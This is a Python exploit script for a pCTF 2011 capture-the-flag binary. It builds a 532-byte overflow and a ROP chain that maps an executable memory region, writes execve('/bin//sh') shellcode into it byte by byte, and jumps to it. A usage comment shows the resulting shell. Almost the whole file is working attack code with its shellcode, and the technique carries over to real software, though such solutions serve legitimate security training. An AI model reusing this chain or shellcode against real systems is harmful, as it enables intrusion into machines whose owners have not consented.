exploit.py

  1. # file name : exploit.py
  2.  
  3. #!/usr/bin/env python
  4. # pCTF 2011 - #19 Another small bug
  5. # ROP chain: return into mmap() to obtain an anonymous RWX region, write the shellcode into it one byte at a time with an add [ecx], al gadget, then return into it
  6.  
  7. # $ { python exploit.py; cat; } |/opt/pctf/z2/exploitme 1300   (the trailing `cat` keeps stdin open so the `id` below reaches the spawned shell)
  8. # AAAAA[...]
  9. # id
  10. # uid=2015(z2_16) gid=1001(z2users) egid=1003(z2key) groups=1001(z2users)
  11.  
  12. from struct import pack,unpack
  13.  
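# Target addresses for this 32-bit x86 Linux binary.  Every dword placed in the
# chain is packed little-endian and must not contain 0x0a, since the chain is
# fed to the target over stdin (see the "we dont want 0a" note in the builder
# below; presumably the target's read stops at a newline -- confirm).
mmap = 0x08049ABC  # call target used to reach mmap(2) in exploitme (PLT stub or similar; confirm against the binary)

# Gadgets.  Each is assumed to end in ret, as the chain relies on.
pop_4 = 0x08048973  # add esp, 0x10  -- discards 4 dwords (not used by this chain)
pop_14 = 0x08048d01  # add esp, 0x30 ; pop ebx ; pop esi  -- discards 12 + 2 = 14 dwords
add_ecx_al = 0x08049cfd  # add [ecx], al  -- the one-byte write primitive
pop_ecx = 0x0804889f  # pop ecx
pop_eax = 0x0804859f  # pop eax

# Requested location and length of the RWX scratch mapping.  It is mapped
# MAP_ANONYMOUS, so it starts zero-filled and "add [ecx], al" acts as a store.
area, size = 0x13370000, 0x10000

# 23-byte execve("/bin//sh") shellcode via int 0x80 (push 0xb; pop eax; cdq;
# push edx; push "//sh"; push "/bin"; mov ebx,esp; push edx; push ebx;
# mov ecx,esp; int 0x80).  Contains no 0x0a byte.
SC = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"

# The byte value that must never appear in a packed dword of the chain.
BAD_BYTE = 0x0a


def _has_bad_byte(value):
  """Return True if any of the four little-endian bytes of *value* equals BAD_BYTE."""
  return any(((value >> (8 * k)) & 0xff) == BAD_BYTE for k in range(4))


def copy_byte(address, byte):
  """Return the ROP fragment that stores one shellcode byte at *address*.

  Emits: pop ecx <- address ; pop eax <- ord(byte) ; add [ecx], al.  Only the
  low byte of eax matters; the other three are zero.  The store only works
  because the destination lies in the freshly mmap'ed, zero-filled area.

  Parameters:
    address: absolute destination address (fits in 32 bits).
    byte: a one-character string, as produced by indexing SC.

  Raises ValueError if the packed address or byte value would contain 0x0a --
  the chain's builder must keep that byte out of everything sent to the target,
  and silently emitting it would produce a payload that fails at runtime.
  """
  value = ord(byte)
  if _has_bad_byte(address) or _has_bad_byte(value):
    raise ValueError("0x0a in fragment for address 0x%08x, byte 0x%02x" % (address, value))
  return (pack("<I", pop_ecx) +
          pack("<I", address) +
          pack("<I", pop_eax) +
          pack("<I", value) +
          pack("<I", add_ecx_al))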
  34.  
# Distance from the start of the overflowed buffer to the saved return address
# (found for this binary; re-derive if the target changes).
padding = "A" * 532

# Where the shellcode lives inside the mapping.  Starting at +0xb rather than
# +0 keeps 0x0a out of every destination address in the copy loop
# (area + 0x0a would pack as 0a 00 37 13), and 0x0a must not appear in the chain.
sc_addr = area + 0xb

# Stage 1: return into mmap(area, size, PROT_READ|PROT_WRITE|PROT_EXEC,
# MAP_PRIVATE|MAP_ANONYMOUS, -1, 0).  pop_14 is mmap's return address: it
# discards the 6 arguments plus the 8 filler dwords (14 in total) and then
# rets into stage 2.
mmap_frame = [
  mmap,
  pop_14,
  area,        # void *addr
  size,        # size_t length
  0x7,         # int prot: PROT_READ(0x1) | PROT_WRITE(0x2) | PROT_EXEC(0x4)
  0x22,        # int flags: MAP_ANONYMOUS(0x20) | MAP_PRIVATE(0x02)
  0xffffffff,  # int fd: -1, as MAP_ANONYMOUS requires
  0,           # off_t offset
] + [0] * (14 - 6)  # filler consumed by pop_14

chain = [padding]
chain.extend(pack("<I", dword) for dword in mmap_frame)

# Stage 2: one pop ecx / pop eax / add [ecx], al fragment per shellcode byte.
# The mapping is anonymous (zero-filled), so the add acts as a one-byte store.
# None of these dwords may contain 0x0a.
chain.extend(copy_byte(sc_addr + i, c) for i, c in enumerate(SC))

# Stage 3: the final gadget's ret lands in the shellcode.
chain.append(pack("<I", sc_addr))

p = "".join(chain)

# Python 2 print: writes the payload plus a trailing newline to stdout.  The
# newline is harmless here because it follows the last address in the chain.
print p
  56.  